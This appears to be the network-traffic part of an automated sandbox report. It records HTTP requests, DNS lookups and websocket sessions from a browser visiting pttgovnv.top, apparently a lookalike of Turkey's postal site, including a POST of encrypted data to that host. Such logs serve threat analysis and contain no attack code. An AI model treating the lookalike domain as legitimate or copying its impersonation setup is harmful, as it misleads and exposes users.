Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.css?wid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://chatserver.alo-tech.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liZcA HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liZo-&sid=NtB8sH50cFJwILuEBQUp HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liZcA HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /Sayfalar/Posta/KayitliElektronikPosta.aspx HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1; _ga=GA1.1.1249172285.1725229538; _ga_SFQ172Y7CH=GS1.1.1725229537.1.1.1725229576.0.0.0
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=NtB8sH50cFJwILuEBQUp HTTP/1.1Host: pttgovnv.topConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://pttgovnv.topSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: 0yVvfY9jcwWTwGyANDoLog==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liZow&sid=NtB8sH50cFJwILuEBQUp HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liZ-4&sid=NtB8sH50cFJwILuEBQUp HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liZo-&sid=NtB8sH50cFJwILuEBQUp HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.tr HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: pttem.alo-tech.com_ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t_cookieEnable=true
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.css?wid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://chatserver.alo-tech.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liatI HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6lib3N&sid=QB7JMh6ogzHtMo_gBQUs HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liatI HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=QB7JMh6ogzHtMo_gBQUs HTTP/1.1Host: pttgovnv.topConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://pttgovnv.topSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: rUt5W5wTkFCuhu/MLra7GQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6lib3C&sid=QB7JMh6ogzHtMo_gBQUs HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6lib3N&sid=QB7JMh6ogzHtMo_gBQUs HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6libFS&sid=QB7JMh6ogzHtMo_gBQUs HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6libFV&sid=QB7JMh6ogzHtMo_gBQUs HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6libFS&sid=QB7JMh6ogzHtMo_gBQUs HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6libQf&sid=QB7JMh6ogzHtMo_gBQUs HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6lib_V HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6licBC&sid=qmawR9H0vci5rE9hBQUv HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6lib_V HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=qmawR9H0vci5rE9hBQUv HTTP/1.1Host: pttgovnv.topConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://pttgovnv.topSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: lITiJbjhuQA42bljPLeeOw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6licMj&sid=qmawR9H0vci5rE9hBQUv HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6licB9&sid=qmawR9H0vci5rE9hBQUv HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6licBC&sid=qmawR9H0vci5rE9hBQUv HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6lica0&sid=qmawR9H0vci5rE9hBQUv HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6licMj&sid=qmawR9H0vci5rE9hBQUv HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6licMl&sid=qmawR9H0vci5rE9hBQUv HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: chromecache_311.2.dr, chromecache_278.2.drString found in binary or memory: return b}uC.J="internal.enableAutoEventOnTimer";var hc=ka(["data-gtm-yt-inspected-"]),wC=["www.youtube.com","www.youtube-nocookie.com"],xC,yC=!1; equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: pttgovnv.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.ptt.gov.tr
Source: global trafficDNS traffic detected: DNS query: pttem.alo-tech.com
Source: global trafficDNS traffic detected: DNS query: chatserver.alo-tech.com
Source: global trafficDNS traffic detected: DNS query: netdna.bootstrapcdn.com
Source: global trafficDNS traffic detected: DNS query: service-edge.alo-tech.com
Source: unknownHTTP traffic detected: POST /api/MC4zMDIxMDgwNzc2NjI2MDU5NA== HTTP/1.1Host: pttgovnv.topConnection: keep-aliveContent-Length: 292sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: text/encryptAccept: */*Origin: https://pttgovnv.topSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
